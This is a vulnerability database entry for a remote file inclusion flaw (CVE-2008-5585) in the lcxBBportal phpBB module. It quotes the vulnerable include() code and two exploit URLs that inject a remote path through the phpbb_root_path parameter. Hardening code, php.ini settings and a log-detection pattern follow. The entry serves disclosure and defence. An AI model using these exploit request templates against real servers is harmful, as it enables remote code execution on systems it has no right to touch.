lcxbbportal 'phpbb_root_path' Parameter Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID 1116934 Vulnerability type Code injection
Published 2008-12-04 Updated 2009-01-29
CVE ID CVE-2008-5585 CNNVD ID CNNVD-200812-270
Platform PHP CVSS score 7.5
|Sources
https://www.exploit-db.com/exploits/7341
https://cxsecurity.com/issue/WLB-2008120132
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-270
|Vulnerability details
lcxBBportal is a small module for the phpBB portal that provides convenient block management. Multiple PHP remote file inclusion vulnerabilities exist in lcxBBportal 0.1 Alpha 2. A remote attacker can execute arbitrary PHP code via a URL in the phpbb_root_path parameter of (1) portal/includes/portal_block.php and (2) includes/acp/acp_lcxbbportal.php.
|Exploit
=============================================================================================================


  [o] lcxBBportal 0.1 Alpha 2 Remote File Inclusion Vulnerability

       Software : lcxBBportal version 0.1 Alpha 2
       Vendor   : http://code.google.com/p/lcxbbportal/
       Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=============================================================================================================


  [o] Vulnerable file

       portal/includes/portal_block.php

	include($phpbb_root_path . 'includes/bbcode.' . $phpEx);

       includes/acp/acp_lcxbbportal.php

	$phpbb_portal_path = $phpbb_root_path . 'portal/';
	require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
	require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
	include($phpbb_root_path . 'includes/functions_display.' . $phpEx);



  [o] Exploit

       http://localhost/[path]/portal/includes/portal_block.php?phpbb_root_path=[evilcode]
       http://localhost/[path]/includes/acp/acp_lcxbbportal.php?phpbb_root_path=[evilcode]


=============================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
=============================================================================================================

# milw0rm.com [2008-12-04]
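The root cause in the advisory is that `$phpbb_root_path` reaches `include()` without ever being set by trusted code, so a request parameter (with `register_globals` on) or a direct call to the module file decides what gets included. The following is an added illustration, not lcxBBportal's or phpBB's own code: it places the vulnerable include pattern quoted above beside a hardened version that refuses direct access, derives the root path from the filesystem, and restricts includes to a fixed list of local files. The `IN_PHPBB` guard is the convention phpBB 3 modules use; `portal_include()` and its whitelist are assumptions for the example.

```php
<?php
// Added example: vulnerable include pattern vs. hardened form.

// --- Vulnerable pattern (as quoted from portal/includes/portal_block.php) ---
// Nothing in this file assigns $phpbb_root_path, so with register_globals
// enabled ?phpbb_root_path=http://... makes include() fetch remote PHP.
//
//   include($phpbb_root_path . 'includes/bbcode.' . $phpEx);

// --- Hardened pattern ---

// 1. Refuse direct web access. phpBB entry points define IN_PHPBB before
//    including modules, so a direct request to this file exits immediately.
if (!defined('IN_PHPBB')) {
    exit;
}

// 2. Derive the root path from the file's own location, never from request
//    input. This file lives in <root>/portal/includes/, two levels down.
$phpbb_root_path = dirname(dirname(__DIR__)) . '/';
$phpEx = 'php';

// 3. Only include files from a fixed list, resolved to a real path that must
//    stay under the root. realpath() rejects URLs and wrappers outright.
function portal_include(string $root, string $relative, string $ext): void
{
    $allowed = ['includes/bbcode', 'includes/functions_display']; // assumed list
    if (!in_array($relative, $allowed, true)) {
        throw new RuntimeException("refusing to include '$relative'");
    }
    $base   = realpath($root);
    $target = realpath($root . $relative . '.' . $ext);
    if ($base === false || $target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("include target outside root: '$relative'");
    }
    include $target;
}

portal_include($phpbb_root_path, 'includes/bbcode', $phpEx);
```

Independently of the code fix, `allow_url_include=Off` and `register_globals=Off` in php.ini remove the two preconditions this class of bug relies on, and a web-server log filter for `phpbb_root_path=` values containing `://` is a cheap way to spot probing for it.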
|References

Source: XF
Name: lcxbbportal-phpbbrootpath-file-include(47092)
Link: http://xforce.iss.net/xforce/xfdb/47092
Source: BID
Name: 32647
Link: http://www.securityfocus.com/bid/32647
Source: MILW0RM
Name: 7341
Link: http://www.milw0rm.com/exploits/7341
Source: SREASON
Name: 4738
Link: http://securityreason.com/securityalert/4738
Source: MISC
Link: http://packetstormsecurity.org/0812-exploits/icxbbportal-rfi.txt